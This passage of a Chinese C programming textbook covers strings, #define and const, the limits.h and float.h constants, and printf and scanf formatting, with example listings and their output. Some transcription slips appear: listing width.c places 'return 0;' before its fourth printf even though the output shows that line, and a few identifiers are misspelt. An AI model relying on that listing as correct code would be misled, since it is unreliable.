语言用它标记字符串的结束。空字符不是数字0,它是非打印字符,其ASCII 码值是(或等价于)0。C中的字符串一定以空字符结束,这意味着数组的 容量必须至少比待存储字符串中的字符数多1。因此,程序清单4.1中有40个 存储单元的字符串,只能储存39个字符,剩下一个字节留给空字符。 那么,什么是数组?可以把数组看作是一行连续的多个存储单元。用更 正式的说法是,数组是同类型数据元素的有序序列。程序清单4.1通过以下 声明创建了一个包含40个存储单元(或元素)的数组,每个单元储存一个 char类型的值: char name[40]; name后面的方括号表明这是一个数组,方括号中的40表明该数组中的 178 元素数量。char表明每个元素的类型(见图4.2)。 图4.2 声明一个变量和声明一个数组 字符串看上去比较复杂!必须先创建一个数组,把字符串中的字符逐个 放入数组,还要记得在末尾加上一个\0。还好,计算机可以自己处理这些细 节。 4.2.2 使用字符串 试着运行程序清单4.2,使用字符串其实很简单。 程序清单4.2 praise1.c程序 /* praise1.c -- 使用不同类型的字符串 */ #include <stdio.h> 179 #define PRAISE "You are an extraordinary being." int main(void) { char name[40]; printf("What's your name? "); scanf("%s", name); printf("Hello, %s.%s\n", name, PRAISE); return 0; } %s告诉printf()打印一个字符串。%s出现了两次,因为程序要打印两个 字符串:一个储存在name数组中;一个由PRAISE来表示。运行praise1.c, 其输出如下所示: What's your name? Angela Plains Hello, Angela.You are an extraordinary being. 你不用亲自把空字符放入字符串末尾,scanf()在读取输入时就已完成这 项工作。也不用在字符串常量PRAISE末尾添加空字符。稍后我们会解释 #define指令,现在先理解PRAISE后面用双引号括起来的文本是一个字符 串。编译器会在末尾加上空字符。 注意(这很重要),scanf()只读取了Angela Plains中的Angela,它在遇 到第1个空白(空格、制表符或换行符)时就不再读取输入。因此,scanf() 在读到Angela和Plains之间的空格时就停止了。一般而言,根据%s转换说 明,scanf()只会读取字符串中的一个单词,而不是一整句。C语言还有其他 180 的输入函数(如,fgets()),用于读取一般字符串。后面章节将详细介绍这 些函数。 字符串和字符 字符串常量"x"和字符常量'x'不同。区别之一在于'x'是基本类型 (char),而"x"是派生类型(char数组);区别之二是"x"实际上由两个字符 组成:'x'和空字符\0(见图4.3)。 图4.3 字符'x'和字符串"x" 4.2.3 strlen()函数 上一章提到了 sizeof 运算符,它以字节为单位给出对象的大小。strlen() 函数给出字符串中的字符长度。因为 1 字节储存一个字符,读者可能认为把 两种方法应用于字符串得到的结果相同,但事实并非如此。请根据程序清单 4.3,在程序清单4.2中添加几行代码,看看为什么会这样。 程序清单4.3 praise2.c程序 /* praise2.c */ // 如果编译器不识别%zd,尝试换成%u或%lu。 #include <stdio.h> #include <string.h>  /* 提供strlen()函数的原型 */ 181 #define PRAISE "You are an extraordinary being." int main(void) { char name[40]; printf("What's your name? "); scanf("%s", name); printf("Hello, %s.%s\n", name, PRAISE); printf("Your name of %zd letters occupies %zd memory cells.\n", strlen(name), sizeof name); printf("The phrase of praise has %zd letters ", strlen(PRAISE)); printf("and occupies %zd memory cells.\n", sizeof PRAISE); return 0; } 如果使用ANSI C之前的编译器,必须移除这一行: #include <string.h> string.h头文件包含多个与字符串相关的函数原型,包括strlen()。第11章 将详细介绍该头文件(顺带一提,一些ANSI之前的UNIX系统用strings.h代替 string.h,其中也包含了一些字符串函数的声明)。 一般而言,C 把函数库中相关的函数归为一类,并为每类函数提供一个 182 头文件。例如,printf()和scanf()都隶属标准输入和输出函数,使用stdio.h头 文件。string.h头文件中包含了strlen()函数和其他一些与字符串相关的函数 (如拷贝字符串的函数和字符串查找函数)。 注意,程序清单4.3使用了两种方法处理很长的printf()语句。第1种方法 是将printf()语句分为两行(可以在参数之间断为两行,但是不要在双引号中 的字符串中间断开);第 2 种方法是使用两个printf()语句打印一行内容,只 在第2条printf()语句中使用换行符(\n)。运行该程序,其交互输出如下: What's your name? Serendipity Chance Hello, Serendipity.You are an extraordinary being. Your name of 11 letters occupies 40 memory cells. The phrase of praise has 31 letters and occupies 32 memory cells. sizeof运算符报告,name数组有40个存储单元。但是,只有前11个单元 用来储存Serendipity,所以strlen()得出的结果是11。name数组的第12个单元 储存空字符,strlen()并未将其计入。图4.4演示了这个概念。 图4.4 strlen()函数知道在何处停止 对于 PRAISE,用 strlen()得出的也是字符串中的字符数(包括空格和标 点符号)。然而,sizeof运算符给出的数更大,因为它把字符串末尾不可见 的空字符也计算在内。该程序并未明确告诉计算机要给字符串预留多少空 间,所以它必须计算双引号内的字符数。 183 第 3 章提到过,C99 和 C11 标准专门为 sizeof 运算符的返回类型添加 了%zd 转换说明,这对于strlen()同样适用。对于早期的C,还要知道sizeof和 strlen()返回的实际类型(通常是unsigned或unsigned long)。 另外,还要注意一点:上一章的 sizeof 使用了圆括号,但本例没有。圆 括号的使用时机否取决于运算对象是类型还是特定量?运算对象是类型时, 圆括号必不可少,但是对于特定量,可有可无。也就是说,对于类型,应写 成sizeof(char)或sizeof(float);对于特定量,可写成sizeof name或sizeof 6.28。 尽管如此,还是建议所有情况下都使用圆括号,如sizeof(6.28)。 程序清单4.3中使用strlen()和sizeof,完全是为了满足读者的好奇心。在 实际应用中,strlen()和 sizeof 是非常重要的编程工具。例如,在各种要处理 字符串的程序中,strlen()很有用。详见第11章。 下面我们来学习#define指令。 184 4.3 常量和C预处理器 有时,在程序中要使用常量。例如,可以这样计算圆的周长: circumference = 3.14159 * diameter; 这里,常量3.14159代表著名的常量pi(π)。在该例中,输入实际值便 可使用这个常量。然而,这种情况使用符号常量(symbolic constant)会更 好。也就是说,使用下面的语句,计算机稍后会用实际值完成替换: circumference = pi * diameter; 为什么使用符号常量更好?首先,常量名比数字表达的信息更多。请比 较以下两条语句: owed = 0.015 * housevalue; owed = taxrate * housevalue; 如果阅读一个很长的程序,第2条语句所表达的含义更清楚。 另外,假设程序中的多处使用一个常量,有时需要改变它的值。毕竟, 税率通常是浮动的。如果程序使用符号常量,则只需更改符号常量的定义, 不用在程序中查找使用常量的地方,然后逐一修改。 那么,如何创建符号常量?方法之一是声明一个变量,然后将该变量设 置为所需的常量。可以这样写: float taxrate; taxrate = 0.015; 这样做提供了一个符号名,但是taxrate是一个变量,程序可能会无意间 改变它的值。C语言还提供了一个更好的方案——C预处理器。第2 章中介 绍了预处理器如何使用#include包含其他文件的信息。预处理器也可用来定 185 义常量。只需在程序顶部添加下面一行: #define TAXRATE 0.015 编译程序时,程序中所有的TAXRATE都会被替换成0.015。这一过程被 称为编译时替换(compile-time substitution)。在运行程序时,程序中所有的 替换均已完成(见图 4.5)。通常,这样定义的常量也称为明示常量 (manifest constant)[1]。 请注意格式,首先是#define,接着是符号常量名(TAXRATE),然后 是符号常量的值(0.015)(注意,其中并没有=符号)。所以,其通用格式 如下: #define NAME value 实际应用时,用选定的符号常量名和合适的值来替换NAME和value。注 意,末尾不用加分号,因为这是一种由预处理器处理的替换机制。为什么 TAXRATE 要用大写?用大写表示符号常量是 C 语言一贯的传统。这样,在 程序中看到全大写的名称就立刻明白这是一个符号常量,而非变量。大写常 量只是为了提高程序的可读性,即使全用小写来表示符号常量,程序也能照 常运行。尽管如此,初学者还是应该养成大写常量的好习惯。 另外,还有一个不常用的命名约定,即在名称前带c_或k_前缀来表示常 量(如,c_level或k_line)。 符号常量的命名规则与变量相同。可以使用大小写字母、数字和下划线 字符,首字符不能为数字。程序清单4.4演示了一个简单的示例。 186 187 图4.5 输入的内容和编译后的内容 程序清单4.4 pizza.c程序 /* pizza.c -- 在比萨饼程序中使用已定义的常量 */ #include <stdio.h> #define PI 3.14159 int main(void) { float area, circum, radius; printf("What is the radius of your pizza?\n"); scanf("%f", &radius); area = PI * radius * radius; circum = 2.0 * PI *radius; printf("Your basic pizza parameters are as follows:\n"); printf("circumference = %1.2f, area = %1.2f\n", circum,area); return 0; } printf()语句中的%1.2f表明,结果被四舍五入为两位小数输出。下面是 一个输出示例: What is the radius of your pizza? 188 6.0 Your basic pizza parameters are as follows: circumference = 37.70, area = 113.10 #define指令还可定义字符和字符串常量。前者使用单引号,后者使用双 引号。如下所示: #define BEEP '\a' #define TEE 'T' #define ESC '\033' #define OOPS "Now you have done it!" 记住,符号常量名后面的内容被用来替换符号常量。不要犯这样的常见 错误: /* 错误的格式 */ #define TOES = 20 如果这样做,替换TOES的是= 20,而不是20。这种情况下,下面的语 句: digits = fingers + TOES; 将被转换成错误的语句: digits = fingers + = 20; 4.3.1 const限定符 C90标准新增了const关键字,用于限定一个变量为只读 [2]。其声明如 189 下: const int MONTHS = 12; // MONTHS在程序中不可更改,值为12 这使得MONTHS成为一个只读值。也就是说,可以在计算中使用 MONTHS,可以打印MONTHS,但是不能更改MONTHS的值。const用起来 比#define更灵活,第12章将讨论与const相关的内容。 4.3.2 明示常量 C头文件limits.h和float.h分别提供了与整数类型和浮点类型大小限制相 关的详细信息。每个头文件都定义了一系列供实现使用的明示常量 [3]。例 如,limits.h头文件包含以下类似的代码: #define INT_MAX +32767 #define INT_MIN -32768 这些明示常量代表int类型可表示的最大值和最小值。如果系统使用32 位的int,该头文件会为这些明示常量提供不同的值。如果在程序中包含 limits.h头文件,就可编写下面的代码: printf("Maximum int value on this system = %d\n", INT_MAX); 如果系统使用4字节的int,limits.h头文件会提供符合4字节int的 INT_MAX和INT_MIN。表4.1列出了limits.h中能找到的一些明示常量。 表4.1 limits.h中的一些明示常量 190 类似地,float.h头文件中也定义一些明示常量,如FLT_DIG和 DBL_DIG,分别表示float类型和double类型的有效数字位数。表4.2列出了 float.h中的一些明示常量(可以使用文本编辑器打开并查看系统使用的float.h 头文件)。表中所列都与float类型相关。把明示常量名中的FLT分别替换成 DBL和LDBL,即可分别表示double和long double类型对应的明示常量(表中 假设系统使用2的幂来表示浮点数)。 表4.2 float.h中的一些明示常量 191 程序清单4.5演示了如何使用float.h和limits.h中的数据(注意,编译器要 完全支持C99标准才能识别LLONG_MIN标识符)。 程序清单4.5 defines.c程序 // defines.c -- 使用limit.h和float头文件中定义的明示常量 #include <stdio.h> #include <limits.h>  // 整型限制 #include <float.h>  // 浮点型限制 int main(void) { printf("Some number limits for this system:\n"); printf("Biggest int: %d\n", INT_MAX); printf("Smallest long long: %lld\n", LLONG_MIN); printf("One byte = %d bits on this system.\n", CHAR_BIT); printf("Largest double: %e\n", DBL_MAX); printf("Smallest normal float: %e\n", FLT_MIN); printf("float precision = %d digits\n", FLT_DIG); printf("float epsilon = %e\n", FLT_EPSILON); return 0; } 192 该程序的输出示例如下: Some number limits for this system: Biggest int: 2147483647 Smallest long long: -9223372036854775808 One byte = 8 bits on this system. Largest double: 1.797693e+308 Smallest normal float: 1.175494e-38 float precision = 6 digits float epsilon = 1.192093e-07 C预处理器是非常有用的工具,要好好利用它。本书的后面章节中会介 绍更多相关应用。 193 4.4 printf()和scanf() printf()函数和scanf()函数能让用户可以与程序交流,它们是输入/输出函 数,或简称为I/O函数。它们不仅是C语言中的I/O函数,而且是最多才多艺 的函数。过去,这些函数和C库的一些其他函数一样,并不是C语言定义的 一部分。最初,C把输入/输出的实现留给了编译器的作者,这样可以针对特 殊的机器更好地匹配输入/输出。后来,考虑到兼容性的问题,各编译器都 提供不同版本的printf()和scanf()。尽管如此,各版本之间偶尔有一些差异。 C90 和C99 标准规定了这些函数的标准版本,本书亦遵循这一标准。 虽然printf()是输出函数,scanf()是输入函数,但是它们的工作原理几乎 相同。两个函数都使用格式字符串和参数列表。我们先介绍printf(),再介绍 scanf()。 4.4.1 printf()函数 请求printf()函数打印数据的指令要与待打印数据的类型相匹配。例如, 打印整数时使用%d,打印字符时使用%c。这些符号被称为转换说明 (conversion specification),它们指定了如何把数据转换成可显示的形式。 我们先列出ANSI C标准为printf()提供的转换说明,然后再示范如何使用一些 较常见的转换说明。表4.3列出了一些转换说明和各自对应的输出类型。 表4.3 转换说明及其打印的输出结果 194 4.4.2 使用printf() 程序清单4.6的程序中使用了一些转换说明。 程序清单4.6 printout.c程序 /* printout.c -- 使用转换说明 */ #include <stdio.h> #define PI 3.141593 int main(void) { int number = 7; float pies = 12.75; 195 int cost = 7800; printf("The %d contestants ate %f berry pies.\n", number, pies); printf("The value of pi is %f.\n", PI); printf("Farewell! thou art too dear for my possessing,\n"); printf("%c%d\n", '$', 2 * cost); return 0; } 该程序的输出如下: The 7 contestants ate 12.750000 berry pies. The value of pi is 3.141593. Farewell! thou art too dear for my possessing, $15600 这是printf()函数的格式: printf( 格式字符串, 待打印项1, 待打印项2,...); 待打印项1、待打印项2等都是要打印的项。它们可以是变量、常量,甚 至是在打印之前先要计算的表达式。第3章提到过,格式字符串应包含每个 待打印项对应的转换说明。例如,考虑下面的语句: printf("The %d contestants ate %f berry pies.\n", number,pies); 格式字符串是双引号括起来的内容。上面语句的格式字符串包含了两个 196 待打印项number和poes对应的两个转换说明。图4.6演示了printf()语句的另一 个例子。 下面是程序清单4.6中的另一行: printf("The value of pi is %f.\n", PI); 该语句中,待打印项列表只有一个项——符号常量PI。 如图4.7所示,格式字符串包含两种形式不同的信息: 实际要打印的字符; 转换说明。 图4.6 printf()的参数 图4.7 剖析格式字符串 警告 格式字符串中的转换说明一定要与后面的每个项相匹配,若忘记这个基 本要求会导致严重的后果。千万别写成下面这样: 197 printf("The score was Squids %d, Slugs %d.\n", score1); 这里,第2个%d没有对应任何项。系统不同,导致的结果也不同。不 过,出现这种问题最好的状况是得到无意义的值。 如果只打印短语或句子,就不需要使用任何转换说明。如果只打印数 据,也不用加入说明文字。程序清单4.6中的最后两个printf()语句都没问 题: printf("Farewell! thou art too dear for my possessing,\n"); printf("%c%d\n", '$', 2 * cost); 注意第2条语句,待打印列表的第1个项是一个字符常量,不是变量;第 2个项是一个乘法表达式。这说明printf()使用的是值,无论是变量、常量还 是表达式的值。 由于 printf()函数使用%符号来标识转换说明,因此打印%符号就成了个 问题。如果单独使用一个%符号,编译器会认为漏掉了一个转换字符。解决 方法很简单,使用两个%符号就行了: pc = 2*6; printf("Only %d%% of Sally's gribbles were edible.\n", pc); 下面是输出结果: Only 12% of Sally's gribbles were edible. 4.4.3 printf()的转换说明修饰符 在%和转换字符之间插入修饰符可修饰基本的转换说明。表4.4和表4.5 列出可作为修饰符的合法字符。如果要插入多个字符,其书写顺序应该与表 4.4中列出的顺序相同。不是所有的组合都可行。表中有些字符是C99新增 的,如果编译器不支持C99,则可能不支持表中的所有项。 198 表4.4 printf()的修饰符 199 注意 类型可移植性 sizeof 运算符以字节为单位返回类型或值的大小。这应该是某种形式的 整数,但是标准只规定了该值是无符号整数。在不同的实现中,它可以是 unsigned int、unsigned long甚至是unsigned long long。因此,如果要用printf() 函数显示sizeof表达式,根据不同系统,可能使用%u、%lu或%llu。这意味 着要查找你当前系统的用法,如果把程序移植到不同的系统还要进行修改。 鉴于此, C提供了可移植性更好的类型。首先,stddef.h头文件(在包含 200 stdio.h头文件时已包含其中)把size_t定义成系统使用sizeof返回的类型,这 被称为底层类型(underlying type)。其次,printf()使用z修饰符表示打印相 应的类型。同样,C还定义了ptrdiff_t类型和t修饰符来表示系统使用的两个 地址差值的底层有符号整数类型。 注意 float参数的转换 对于浮点类型,有用于double和long double类型的转换说明,却没有 float类型的。这是因为在K&R C中,表达式或参数中的float类型值会被自动 转换成double类型。一般而言,ANSI C不会把float自动转换成double。然 而,为保护大量假设float类型的参数被自动转换成double的现有程序, printf()函数中所有float类型的参数(对未使用显式原型的所有C函数都有 效)仍自动转换成double类型。因此,无论是K&R C还是ANSI C,都没有显 示float类型值专用的转换说明。 表4.5 printf()中的标记 1.使用修饰符和标记的示例 接下来,用程序示例演示如何使用这些修饰符和标记。先来看看字段宽 度在打印整数时的效果。考虑程序清单4.7中的程序。 程序清单4.7 width.c程序 201 /* width.c -- 字段宽度 */ #include <stdio.h> #define PAGES 959 int main(void) { printf("*%d*\n", PAGES); printf("*%2d*\n", PAGES); printf("*%10d*\n", PAGES); return 0; printf("*%-10d*\n", PAGES); } 程序清单4.7通过4种不同的转换说明把相同的值打印了4次。程序中使 用星号(*)标出每个字段的开始和结束。其输出结果如下所示: *959* *959* *   959* *959   * 第1个转换说明%d不带任何修饰符,其对应的输出结果与带整数字段宽 度的转换说明的输出结果相同。在默认情况下,没有任何修饰符的转换说 明,就是这样的打印结果。第2个转换说明是%2d,其对应的输出结果应该 202 是 2 字段宽度。因为待打印的整数有 3 位数字,所以字段宽度自动扩大以符 合整数的长度。第 3个转换说明是%10d,其对应的输出结果有10个空格宽 度,实际上在两个星号之间有7个空格和3位数字,并且数字位于字段的右 侧。最后一个转换说明是%-10d,其对应的输出结果同样是 10 个空格宽 度,-标记说明打印的数字位于字段的左侧。熟悉它们的用法后,能很好地 控制输出格式。试着改变PAGES的值,看看编译器如何打印不同位数的数 字。 接下来看看浮点型格式。请输入、编译并运行程序清单4.8中的程序。 程序清单4.8 floats.c程序 // floats.c -- 一些浮点型修饰符的组合 #include <stdio.h> int main(void) { const double RENT = 3852.99; // const变量 printf("*%f*\n", RENT); printf("*%e*\n", RENT); printf("*%4.2f*\n", RENT); printf("*%3.1f*\n", RENT); printf("*%10.3f*\n", RENT); printf("*%10.3E*\n", RENT); printf("*%+4.2f*\n", RENT); 203 printf("*%010.2f*\n", RENT); return 0; } 该程序中使用了const关键字,限定变量为只读。该程序的输出如下: *3852.990000* *3.852990e+03* *3852.99* *3853.0* * 3852.990* * 3.853E+03* *+3852.99* *0003852.99* 本例的第1个转换说明是%f。在这种情况下,字段宽度和小数点后面的 位数均为系统默认设置,即字段宽度是容纳带打印数字所需的位数和小数点 后打印6位数字。 第2个转换说明是%e。默认情况下,编译器在小数点的左侧打印1个数 字,在小数点的右侧打印6个数字。这样打印的数字太多!解决方案是指定 小数点右侧显示的位数,程序中接下来的 4 个例子就是这样做的。请注意, 第4个和第6个例子对输出结果进行了四舍五入。另外,第6个例子用E代替 了e。 第7个转换说明中包含了+标记,这使得打印的值前面多了一个代数符 号(+)。0标记使得打印的值前面以0填充以满足字段要求。注意,转换说 204 明%010.2f的第1个0是标记,句点(.)之前、标记之后的数字(本例为10) 是指定的字段宽度。尝试修改RENT的值,看看编译器如何打印不同大小的 值。程序清单4.9演示了其他组合。 程序清单4.9 flags.c程序 /* flags.c -- 演示一些格式标记 */ #include <stdio.h> int main(void) { printf("%x %X %#x\n", 31, 31, 31); printf("**%d**% d**% d**\n", 42, 42, -42); printf("**%5d**%5.3d**%05d**%05.3d**\n", 6, 6, 6, 6); return 0; } 该程序的输出如下: 1f 1F 0x1f **42** 42**-42** **  6** 006**00006** 006** 第1行输出中,1f是十六进制数,等于十进制数31。第1行printf()语句 中,根据%x打印出1f,%F打印出1F,%#x打印出0x1f。 第 2 行输出演示了如何在转换说明中用空格在输出的正值前面生成前导 205 空格,负值前面不产生前导空格。这样的输出结果比较美观,因为打印出来 的正值和负值在相同字段宽度下的有效数字位数相同。 第3行输出演示了如何在整型格式中使用精度(%5.3d)生成足够的前 导0以满足最小位数的要求(本例是3)。然而,使用0标记会使得编译器用 前导0填充满整个字段宽度。最后,如果0标记和精度一起出现,0标记会被 忽略。 下面来看看字符串格式的示例。考虑程序清单4.10中的程序。 程序清单4.10 stringf.c程序 /* stringf.c -- 字符串格式 */ #include <stdio.h> #define BLURB "Authentic imitation!" int main(void) { printf("[%2s]\n", BLURB); printf("[%24s]\n", BLURB); printf("[%24.5s]\n", BLURB); printf("[%-24.5s]\n", BLURB); return 0; } 该程序的输出如下: 206 [Authentic imitation!] [  Authentic imitation!] [          Authe] [Authe          ] 注意,虽然第1个转换说明是%2s,但是字段被扩大为可容纳字符串中 的所有字符。还需注意,精度限制了待打印字符的个数。.5告诉printf()只打 印5个字符。另外,-标记使得文本左对齐输出。 2.学以致用 学习完以上几个示例,试试如何用一个语句打印以下格式的内容: The NAME family just may be $XXX.XX dollars richer! 这里,NAME和XXX.XX代表程序中变量(如name[40]和cash)的值。 可参考以下代码: printf("The %s family just may be $%.2f richer!\n",name,cash); 4.4.4 转换说明的意义 下面深入探讨一下转换说明的意义。转换说明把以二进制格式储存在计 算机中的值转换成一系列字符(字符串)以便于显示。例如,数字76在计算 机内部的存储格式是二进制数01001100。%d转换说明将其转换成字符7和 6,并显示为76;%x转换说明把相同的值(01001100)转换成十六进制记数 法4c;%c转换说明把01001100转换成字符L。 转换(conversion)可能会误导读者认为原始值被转替换成转换后的 值。实际上,转换说明是翻译说明,%d的意思是“把给定的值翻译成十进制 整数文本并打印出来”。 207 1.转换不匹配 前面强调过,转换说明应该与待打印值的类型相匹配。通常都有多种选 择。例如,如果要打印一个int类型的值,可以使用%d、%x或%o。这些转换 说明都可用于打印int类型的值,其区别在于它们分别表示一个值的形式不 同。类似地,打印double类型的值时,可使用%f、%e或%g。 转换说明与待打印值的类型不匹配会怎样?上一章中介绍过不匹配导致 的一些问题。匹配非常重要,一定要牢记于心。程序清单4.11演示了一些不 匹配的整型转换示例。 程序清单4.11 intconv.c程序 /* intconv.c -- 一些不匹配的整型转换 */ #include <stdio.h> #define PAGES 336 #define WORDS 65618 int main(void) { short num = PAGES; short mnum = -PAGES; printf("num as short and unsigned short: %hd %hu\n", num,num); printf("-num as short and unsigned short: %hd %hu\n", mnum,mnum); printf("num as int and char: %d %c\n", num, num); printf("WORDS as int, short, and char: %d %hd %c\n",WORDS,WORDS, 208 WORDS); return 0; } 在我们的系统中,该程序的输出如下: num as short and unsigned short: 336 336 -num as short and unsigned short: -336 65200 num as int and char: 336 P WORDS as int, short, and char: 65618 82 R 请看输出的第1行,num变量对应的转换说明%hd和%hu输出的结果都是 336。这没有任何问题。然而,第2行mnum变量对应的转换说明%u(无符 号)输出的结果却为65200,并非期望的336。这是由于有符号short int类型 的值在我们的参考系统中的表示方式所致。首先,short int的大小是2字节; 其次,系统使用二进制补码来表示有符号整数。这种方法,数字0~32767代 表它们本身,而数字32768~65535则表示负数。其中,65535表示-1,65534 表示-2,以此类推。因此,-336表示为65200(即, 65536-336)。所以被解 释成有符号int时,65200代表-336;而被解释成无符号int时,65200则代表 65200。一定要谨慎!一个数字可以被解释成两个不同的值。尽管并非所有 的系统都使用这种方法来表示负整数,但要注意一点:别期望用%u转换说 明能把数字和符号分开。 第3行演示了如果把一个大于255的值转换成字符会发生什么情况。在我 们的系统中,short int是2字节,char是1字节。当printf()使用%c打印336时, 它只会查看储存336的2字节中的后1字节。这种截断(见图4.8)相当于用一 个整数除以256,只保留其余数。在这种情况下,余数是80,对应的ASCII值 是字符P。用专业术语来说,该数字被解释成“以256为模”(modulo 256), 即该数字除以256后取其余数。 209 图4.8 把336转换成字符 最后,我们在该系统中打印比short int类型最大整数(32767)更大的整 数(65618)。这次,计算机也进行了求模运算。在本系统中,应把数字 65618储存为4字节的int类型值。用%hd转换说明打印时, printf()只使用最后 2个字节。这相当于65618除以65536的余数。这里,余数是82。鉴于负数的 储存方法,如果余数在32767~65536范围内会被打印成负数。对于整数大小 不同的系统,相应的处理行为类似,但是产生的值可能不同。 混淆整型和浮点型,结果更奇怪。考虑程序清单4.12。 程序清单4.12 floatcnv.c程序 /* floatcnv.c -- 不匹配的浮点型转换 */ #include <stdio.h> int main(void) { float n1 = 3.0; double n2 = 3.0; long n3 = 2000000000; long n4 = 1234567890; printf("%.1e %.1e %.1e %.1e\n", n1, n2, n3, n4); 210 printf("%ld %ld\n", n3, n4); printf("%ld %ld %ld %ld\n", n1, n2, n3, n4); return 0; } 在我们的系统中,该程序的输出如下: 3.0e+00 3.0e+00 3.1e+46 1.7e+266 2000000000 1234567890 0 1074266112 0 1074266112 第1行输出显示,%e转换说明没有把整数转换成浮点数。考虑一下,如 果使用%e转换说明打印n3(long类型)会发生什么情况。首先,%e转换说 明让printf()函数认为待打印的值是double类型(本系统中double为8字节)。 当printf()查看n3(本系统中是4字节的值)时,除了查看n3的4字节外,还会 查看查看n3相邻的4字节,共8字节单元。接着,它将8字节单元中的位组合 解释成浮点数(如,把一部分位组合解释成指数)。因此,即使n3的位数正 确,根据%e转换说明和%ld转换说明解释出来的值也不同。最终得到的结果 是无意义的值。 第1行也说明了前面提到的内容:float类型的值作为printf()参数时会被 转换成double类型。在本系统中,float是4字节,但是为了printf()能正确地显 示该值,n1被扩成8字节。 第2行输出显示,只要使用正确的转换说明,printf()就可以打印n3和 n4。 第3行输出显示,如果printf()语句有其他不匹配的地方,即使用对了转 换说明也会生成虚假的结果。用%ld转换说明打印浮点数会失败,但是在这 里,用%ld打印long类型的数竟然也失败了!问题出在C如何把信息传递给函 211 数。具体情况因编译器实现而异。“参数传递”框中针对一个有代表性的系统 进行了讨论。 参数传递 参数传递机制因实现而异。下面以我们的系统为例,分析参数传递的原 理。函数调用如下: printf("%ld %ld %ld %ld\n", n1, n2, n3, n4); 该调用告诉计算机把变量n1、n2、、n3和n4的值传递给程序。这是一种 常见的参数传递方式。程序把传入的值放入被称为栈(stack)的内存区域。 计算机根据变量类型(不是根据转换说明)把这些值放入栈中。因此,n1被 储存在栈中,占8字节(float类型被转换成double类型)。同样,n2也在栈中 占8字节,而n3和n4在栈中分别占4字节。然后,控制转到printf()函数。该函 数根据转换说明(不是根据变量类型)从栈中读取值。%ld转换说明表明 printf()应该读取4字节,所以printf()读取栈中的前4字节作为第1个值。这是 n1的前半部分,将被解释成一个long类型的整数。根据下一个%ld转换说 明,printf()再读取4字节,这是n1的后半部分,将被解释成第2个long类型的 整数(见图4.9)。类似地,根据第3个和第4个%ld,printf()读取n2的前半部 分和后半部分,并解释成两个long类型的整数。因此,对于n3和n4,虽然用 对了转换说明,但printf()还是读错了字节。 float n1; /* 作为double类型传递 */ double n2; long n3, n4; ... printf("%ld %ld %ld %ld\n", n1, n2, n3, n4); 212 图4.9 传递参数 2.printf()的返回值 第2章提到过,大部分C函数都有一个返回值,这是函数计算并返回给 主调程序(calling program)的值。例如,C库包含一个sqrt()函数,接受一 个数作为参数,并返回该数的平方根。可以把返回值赋给变量,也可以用于 计算,还可以作为参数传递。总之,可以把返回值像其他值一样使用。 printf()函数也有一个返回值,它返回打印字符的个数。如果有输出错误, printf()则返回一个负值(printf()的旧版本会返回不同的值)。 213 printf()的返回值是其打印输出功能的附带用途,通常很少用到,但在检 查输出错误时可能会用到(如,在写入文件时很常用)。如果一张已满的 CD或DVD拒绝写入时,程序应该采取相应的行动,例如终端蜂鸣30秒。不 过,要实现这种情况必须先了解if语句。程序清单4.13演示了如何确定函数 的返回值。 程序清单4.13 prntval.c程序 /* prntval.c -- printf()的返回值 */ #include <stdio.h> int main(void) { int bph2o = 212; int rv; rv = printf("%d F is water's boiling point.\n", bph2o); printf("The printf() function printed %d characters.\n", rv); return 0; } 该程序的输出如下: 212 F is water's boiling point. The printf() function printed 32 characters. 214 首先,程序用rv = printf(...);的形式把printf()的返回值赋给rv。因此,该 语句执行了两项任务:打印信息和给变量赋值。其次,注意计算针对所有字 符数,包括空格和不可见的换行符(\n)。 3.打印较长的字符串 有时,printf()语句太长,在屏幕上不方便阅读。如果空白(空格、制表 符、换行符)仅用于分隔不同的部分,C 编译器会忽略它们。因此,一条语 句可以写成多行,只需在不同部分之间输入空白即可。例如,程序清单4.13 中的一条printf()语句: printf("The printf() function printed %d characters.\n", rv); 该语句在逗号和 rv之间断行。为了让读者知道该行未完,示例缩进了 rv。C编译器会忽略多余的空白。 但是,不能在双引号括起来的字符串中间断行。如果这样写: printf("The printf() function printed %d characters.\n", rv); C编译器会报错:字符串常量中有非法字符。在字符串中,可以使用\n 来表示换行字符,但是不能通过按下Enter(或Return)键产生实际的换行 符。 给字符串断行有3种方法,如程序清单4.14所示。 程序清单4.14 longstrg.c程序 /* longstrg.c ––打印较长的字符串 */ #include <stdio.h> 215 int main(void) { printf("Here's one way to print a "); printf("long string.\n"); printf("Here's another way to print a \ long string.\n"); printf("Here's the newest way to print a " "long string.\n");  /* ANSI C */ return 0; } 该程序的输出如下: Here's one way to print a long string. Here's another way to print a long string. Here's the newest way to print a long string. 方法1:使用多个printf()语句。因为第1个字符串没有以\n字符结束,所 以第2个字符串紧跟第1个字符串末尾输出。 方法2:用反斜杠(\)和Enter(或Return)键组合来断行。这使得光标 移至下一行,而且字符串中不会包含换行符。其效果是在下一行继续输出。 但是,下一行代码必须和程序清单中的代码一样从最左边开始。如果缩进该 行,比如缩进5个空格,那么这5个空格就会成为字符串的一部分。 216 方法3:ANSI C引入的字符串连接。在两个用双引号括起来的字符串之 间用空白隔开,C编译器会把多个字符串看作是一个字符串。因此,以下3 种形式是等效的: printf("Hello, young lovers, wherever you are."); printf("Hello, young "   "lovers" ", wherever you are."); printf("Hello, young lovers" ", wherever you are."); 上述方法中,要记得在字符串中包含所需的空格。 如,"young""lovers"会成为"younglovers",而"young " "lovers"才是"young lovers"。 4.4.5 使用scanf() 刚学完输出,接下来我们转至输入——学习scanf()函数。C库包含了多 个输入函数,scanf()是最通用的一个,因为它可以读取不同格式的数据。当 然,从键盘输入的都是文本,因为键盘只能生成文本字符:字母、数字和标 点符号。如果要输入整数 2014,就要键入字符 2、0、1、4。如果要将其储 存为数值而不是字符串,程序就必须把字符依次转换成数值,这就是scanf() 要做的。scanf()把输入的字符串转换成整数、浮点数、字符或字符串,而 printf()正好与它相反,把整数、浮点数、字符和字符串转换成显示在屏幕上 的文本。 scanf()和 printf()类似,也使用格式字符串和参数列表。scanf()中的格式 字符串表明字符输入流的目标数据类型。两个函数主要的区别在参数列表 中。printf()函数使用变量、常量和表达式,而scanf()函数使用指向变量的指 针。这里,读者不必了解如何使用指针,只需记住以下两条简单的规则: 如果用scanf()读取基本变量类型的值,在变量名前加上一个&; 217 如果用scanf()把字符串读入字符数组中,不要使用&。 程序清单4.15中的小程序演示了这两条规则。 程序清单4.15 input.c程序 // input.c -- 何时使用& #include <stdio.h> int main(void) { int age;      // 变量 float assets;   // 变量 char pet[30];   // 字符数组,用于储存字符串 printf("Enter your age, assets, and favorite pet.\n"); scanf("%d %f", &age, &assets); 